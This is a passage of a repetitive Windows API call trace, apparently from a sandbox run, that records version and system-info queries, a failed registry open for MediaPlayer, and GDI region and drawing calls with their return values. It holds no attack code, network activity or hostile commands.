hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.259] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.259] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.259] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.259] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c0401d9 [0089.259] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a0401dc [0089.259] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455d3 [0089.259] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455d4 [0089.259] CombineRgn (hrgnDst=0x10455d3, hrgnSrc1=0x6c0401d9, hrgnSrc2=0x6a0401dc, iMode=1) returned 1 [0089.259] CombineRgn (hrgnDst=0x10455d4, hrgnSrc1=0x6c0401d9, hrgnSrc2=0x6a0401dc, iMode=4) returned 2 [0089.259] CreateSolidBrush (color=0xff) returned 0x21055d2 [0089.259] CreateSolidBrush (color=0xff0000) returned 0x11055d5 [0089.259] DeleteObject (ho=0x11055d5) returned 1 [0089.259] DeleteObject (ho=0x6a0401dc) returned 1 [0089.259] DeleteObject (ho=0x6c0401d9) returned 1 [0089.259] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.259] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.259] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.259] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.259] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.259] BeginPath (hdc=0x0) returned 0 [0089.259] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.259] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.259] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.259] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.259] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.259] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.259] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.259] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.259] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b0401dc [0089.259] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d0401d9 [0089.259] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455d6 [0089.260] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455d7 [0089.260] CombineRgn (hrgnDst=0x10455d6, hrgnSrc1=0x6b0401dc, hrgnSrc2=0x6d0401d9, iMode=1) returned 1 [0089.260] CombineRgn (hrgnDst=0x10455d7, hrgnSrc1=0x6b0401dc, hrgnSrc2=0x6d0401d9, iMode=4) returned 2 [0089.260] CreateSolidBrush (color=0xff) returned 0x21055d5 [0089.260] CreateSolidBrush (color=0xff0000) returned 0x11055d8 [0089.260] DeleteObject (ho=0x11055d8) returned 1 [0089.260] DeleteObject (ho=0x6d0401d9) returned 1 [0089.260] DeleteObject (ho=0x6b0401dc) returned 1 [0089.260] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.260] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.260] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.260] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.260] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.260] BeginPath (hdc=0x0) returned 0 [0089.260] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.260] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.260] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.260] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.260] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.260] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.260] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.260] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.260] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e0401d9 [0089.260] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c0401dc [0089.260] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455d9 [0089.260] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455da [0089.260] CombineRgn (hrgnDst=0x10455d9, hrgnSrc1=0x6e0401d9, hrgnSrc2=0x6c0401dc, iMode=1) returned 1 [0089.260] CombineRgn (hrgnDst=0x10455da, hrgnSrc1=0x6e0401d9, hrgnSrc2=0x6c0401dc, iMode=4) returned 2 [0089.260] CreateSolidBrush (color=0xff) returned 0x21055d8 [0089.260] CreateSolidBrush (color=0xff0000) returned 0x11055db [0089.260] DeleteObject (ho=0x11055db) returned 1 [0089.260] DeleteObject (ho=0x6c0401dc) returned 1 [0089.260] DeleteObject (ho=0x6e0401d9) returned 1 [0089.260] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.260] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.260] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.260] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.260] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.260] BeginPath (hdc=0x0) returned 0 [0089.260] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.261] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.261] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.261] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.261] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.261] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.261] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.261] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.261] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d0401dc [0089.261] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f0401d9 [0089.261] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455dc [0089.261] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455dd [0089.261] CombineRgn (hrgnDst=0x10455dc, hrgnSrc1=0x6d0401dc, hrgnSrc2=0x6f0401d9, iMode=1) returned 1 [0089.261] CombineRgn (hrgnDst=0x10455dd, hrgnSrc1=0x6d0401dc, hrgnSrc2=0x6f0401d9, iMode=4) returned 2 [0089.261] CreateSolidBrush (color=0xff) returned 0x21055db [0089.261] CreateSolidBrush (color=0xff0000) returned 0x11055de [0089.261] DeleteObject (ho=0x11055de) returned 1 [0089.261] DeleteObject (ho=0x6f0401d9) returned 1 [0089.261] DeleteObject (ho=0x6d0401dc) returned 1 [0089.261] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.261] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.261] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.261] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.261] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.261] BeginPath (hdc=0x0) returned 0 [0089.261] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.261] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.261] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.261] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.261] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.261] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.261] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.261] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.261] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x700401d9 [0089.261] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e0401dc [0089.262] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455df [0089.262] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455e0 [0089.262] CombineRgn (hrgnDst=0x10455df, hrgnSrc1=0x700401d9, hrgnSrc2=0x6e0401dc, iMode=1) returned 1 [0089.262] CombineRgn (hrgnDst=0x10455e0, hrgnSrc1=0x700401d9, hrgnSrc2=0x6e0401dc, iMode=4) returned 2 [0089.262] CreateSolidBrush (color=0xff) returned 0x21055de [0089.262] CreateSolidBrush (color=0xff0000) returned 0x11055e1 [0089.262] DeleteObject (ho=0x11055e1) returned 1 [0089.262] DeleteObject (ho=0x6e0401dc) returned 1 [0089.262] DeleteObject (ho=0x700401d9) returned 1 [0089.262] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.262] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.262] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.262] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.262] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.262] BeginPath (hdc=0x0) returned 0 [0089.262] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.262] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.262] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.262] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.262] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.262] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.262] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.262] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.262] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f0401dc [0089.262] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x710401d9 [0089.262] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455e2 [0089.262] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455e3 [0089.262] CombineRgn (hrgnDst=0x10455e2, hrgnSrc1=0x6f0401dc, hrgnSrc2=0x710401d9, iMode=1) returned 1 [0089.262] CombineRgn (hrgnDst=0x10455e3, hrgnSrc1=0x6f0401dc, hrgnSrc2=0x710401d9, iMode=4) returned 2 [0089.262] CreateSolidBrush (color=0xff) returned 0x21055e1 [0089.262] CreateSolidBrush (color=0xff0000) returned 0x11055e4 [0089.262] DeleteObject (ho=0x11055e4) returned 1 [0089.262] DeleteObject (ho=0x710401d9) returned 1 [0089.262] DeleteObject (ho=0x6f0401dc) returned 1 [0089.262] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.262] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.262] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.262] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.262] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.262] BeginPath (hdc=0x0) returned 0 [0089.262] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.262] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.263] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.263] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.263] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.263] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.263] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.263] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.263] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x720401d9 [0089.263] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x700401dc [0089.263] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455e5 [0089.263] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455e6 [0089.263] CombineRgn (hrgnDst=0x10455e5, hrgnSrc1=0x720401d9, hrgnSrc2=0x700401dc, iMode=1) returned 1 [0089.263] CombineRgn (hrgnDst=0x10455e6, hrgnSrc1=0x720401d9, hrgnSrc2=0x700401dc, iMode=4) returned 2 [0089.263] CreateSolidBrush (color=0xff) returned 0x21055e4 [0089.263] CreateSolidBrush (color=0xff0000) returned 0x11055e7 [0089.263] DeleteObject (ho=0x11055e7) returned 1 [0089.263] DeleteObject (ho=0x700401dc) returned 1 [0089.263] DeleteObject (ho=0x720401d9) returned 1 [0089.263] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.263] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.263] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.263] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.263] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.263] BeginPath (hdc=0x0) returned 0 [0089.263] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.263] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.263] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.263] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.263] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.263] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.263] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.263] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.263] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x710401dc [0089.263] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x730401d9 [0089.263] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455e8 [0089.263] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455e9 [0089.263] CombineRgn (hrgnDst=0x10455e8, hrgnSrc1=0x710401dc, hrgnSrc2=0x730401d9, iMode=1) returned 1 [0089.264] CombineRgn (hrgnDst=0x10455e9, hrgnSrc1=0x710401dc, hrgnSrc2=0x730401d9, iMode=4) returned 2 [0089.264] CreateSolidBrush (color=0xff) returned 0x21055e7 [0089.264] CreateSolidBrush (color=0xff0000) returned 0x11055ea [0089.264] DeleteObject (ho=0x11055ea) returned 1 [0089.264] DeleteObject (ho=0x730401d9) returned 1 [0089.264] DeleteObject (ho=0x710401dc) returned 1 [0089.264] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.264] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.264] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.264] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.264] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.264] BeginPath (hdc=0x0) returned 0 [0089.264] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.264] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.264] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.264] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.264] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.264] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.264] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.264] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.264] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x740401d9 [0089.264] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x720401dc [0089.264] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455eb [0089.264] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455ec [0089.264] CombineRgn (hrgnDst=0x10455eb, hrgnSrc1=0x740401d9, hrgnSrc2=0x720401dc, iMode=1) returned 1 [0089.264] CombineRgn (hrgnDst=0x10455ec, hrgnSrc1=0x740401d9, hrgnSrc2=0x720401dc, iMode=4) returned 2 [0089.264] CreateSolidBrush (color=0xff) returned 0x21055ea [0089.264] CreateSolidBrush (color=0xff0000) returned 0x11055ed [0089.264] DeleteObject (ho=0x11055ed) returned 1 [0089.264] DeleteObject (ho=0x720401dc) returned 1 [0089.264] DeleteObject (ho=0x740401d9) returned 1 [0089.264] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.264] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.264] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.264] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.264] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.264] BeginPath (hdc=0x0) returned 0 [0089.264] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.265] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.265] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.265] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.265] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.265] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.265] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.265] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.265] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x730401dc [0089.265] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x750401d9 [0089.265] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455ee [0089.265] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455ef [0089.265] CombineRgn (hrgnDst=0x10455ee, hrgnSrc1=0x730401dc, hrgnSrc2=0x750401d9, iMode=1) returned 1 [0089.265] CombineRgn (hrgnDst=0x10455ef, hrgnSrc1=0x730401dc, 